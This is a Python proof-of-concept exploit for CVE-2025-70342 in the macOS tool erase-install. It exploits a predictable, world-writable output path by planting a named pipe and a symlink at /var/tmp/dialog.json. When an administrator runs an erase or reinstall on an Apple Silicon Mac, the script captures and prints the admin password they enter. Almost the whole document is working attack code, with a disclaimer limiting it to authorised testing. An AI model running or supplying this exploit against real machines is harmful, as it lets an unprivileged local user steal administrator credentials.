#!/usr/bin/env python3 """ CVE-2025-70342: Credential Interception in erase-install erase-install <= v40.4 writes swiftDialog credential output to the hardcoded path /var/tmp/dialog.json. On Apple Silicon Macs, admin credentials entered during erase/reinstall are written to this predictable location in a world-writable directory. A local unprivileged attacker creates a named pipe (FIFO) and symlink at the target path to intercept credentials in real time. Prerequisites: - Apple Silicon Mac (password prompt only happens on arm64) - Any local user account (no special privileges) Usage: python3 poc.py # Create FIFO + symlink, wait for creds python3 poc.py --cleanup Attack: 1. Run this script (creates FIFO + symlink, blocks waiting) 2. Admin runs: sudo erase-install.sh --erase 3. Admin enters password in swiftDialog prompt 4. Password flows through FIFO, printed to stdout Disclaimer: For educational and authorized security testing only. Only use on systems you own or have explicit permission to test. """ import argparse import os DIALOG_OUTPUT = "/var/tmp/dialog.json" FIFO_PATH = "/tmp/.dialog-fifo" def watch(): if os.path.exists(FIFO_PATH): os.unlink(FIFO_PATH) os.mkfifo(FIFO_PATH) if os.path.exists(DIALOG_OUTPUT): os.unlink(DIALOG_OUTPUT) os.symlink(FIFO_PATH, DIALOG_OUTPUT) print(f"[+] FIFO: {FIFO_PATH}") print(f"[+] Symlink: {DIALOG_OUTPUT} -> {FIFO_PATH}") print(f"[*] Waiting for credentials...") with open(FIFO_PATH, 'r') as fifo: data = fifo.read() print(f"[+] Captured:\n{data}") def cleanup(): if os.path.islink(DIALOG_OUTPUT): os.unlink(DIALOG_OUTPUT) print(f"[+] Removed: {DIALOG_OUTPUT}") if os.path.exists(FIFO_PATH): os.unlink(FIFO_PATH) print(f"[+] Removed: {FIFO_PATH}") def main(): parser = argparse.ArgumentParser( description="CVE-2025-70342: erase-install credential interception PoC" ) parser.add_argument("--cleanup", action="store_true", help="Remove FIFO and symlink") args = parser.parse_args() if args.cleanup: cleanup() else: watch() if __name__ == "__main__": main()